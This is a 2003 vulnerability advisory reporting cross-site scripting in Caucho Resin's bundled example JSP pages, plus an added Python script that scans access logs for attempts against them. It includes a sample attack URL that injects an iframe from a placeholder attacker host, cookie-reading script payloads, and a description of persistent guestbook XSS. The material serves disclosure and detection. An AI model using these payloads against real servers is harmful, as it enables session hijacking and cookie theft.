- EXPL-A-2003-026 exploitlabs.com Advisory 026 -
-= Caucho Resin =-
Donnie Werner
Oct 18, 2003
note: this is not
http://www.securiteam.com/securitynews/5KP0O1F7FM.html
http://www.securitytracker.com/alerts/2002/Jun/1004552.html
Caucho Resin Httpd 2.x
http://www.caucho.com/sales/customers.xtp
"Resin® is a cutting-edge XML Application Server.
It serves the fastest servlets and JSP."
default port 8080 ( others used )
affected scripts:
env.jsp
form.jsp
session.jsp
tictactoe.jsp
http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
or
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>
the above is only an example; all cookie and session
stealing Cross Site Scripting was possible.
guestbook.jsp allows persistent XSS
enter evil javascript in "name" and "comment" fields
it is then re-rendered upon revisit
nay
yeh
Versions 3.x don't have the examples included
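A defender can check whether the example scripts named above are still deployed and whether markup has been sent to them by reviewing the access log. The following is an added example, not part of the original advisory or of Resin; it assumes Common Log Format, matches the scripts by file name only, and uses constructed log lines with placeholder paths.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Script names from the advisory, matched by file name because only the
# tictactoe path is given in full.
EXAMPLE_SCRIPTS = {"env.jsp", "form.jsp", "session.jsp",
                   "tictactoe.jsp", "guestbook.jsp"}
# Request field of a Common Log Format line (assumed log format).
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3})')
MARKUP_RE = re.compile(r'[<>"\']')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return 'markup', 'exposed', or None for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in EXAMPLE_SCRIPTS:
        return None
    if MARKUP_RE.search(decode_fully(parts.query)):
        return "markup"      # HTML metacharacters sent to an example script
    return "exposed" if m.group("status") == "200" else None

def scan(lines):
    """Return (line_number, verdict) for every line worth reviewing."""
    verdicts = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in verdicts if v]

# Constructed sample lines (documentation addresses, placeholder paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Oct/2003:10:00:01 +0000] "GET /examples/tictactoe/tictactoe.jsp?move=4 HTTP/1.0" 200 812',
    '192.0.2.11 - - [18/Oct/2003:10:00:05 +0000] "GET /examples/tictactoe/tictactoe.jsp?move=%3Ciframe%3E4 HTTP/1.0" 200 840',
    '192.0.2.12 - - [18/Oct/2003:10:00:09 +0000] "GET /examples/PLACEHOLDER/env.jsp?x=%253Cb%253E HTTP/1.0" 200 530',
    '192.0.2.13 - - [18/Oct/2003:10:00:12 +0000] "GET /index.html?q=%3Cb%3E HTTP/1.0" 200 100',
    '192.0.2.14 - - [18/Oct/2003:10:00:15 +0000] "GET /examples/PLACEHOLDER/session.jsp HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

An "exposed" verdict means an example script answered with 200 and should be removed from the server; input to guestbook.jsp is unlikely to appear in the query string, so any hit on that script is worth a manual look.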
[email protected]
Concurrent with this advisory
Donnie Werner
CTO E2 Labs
http://e2-labs.cpm
[email protected]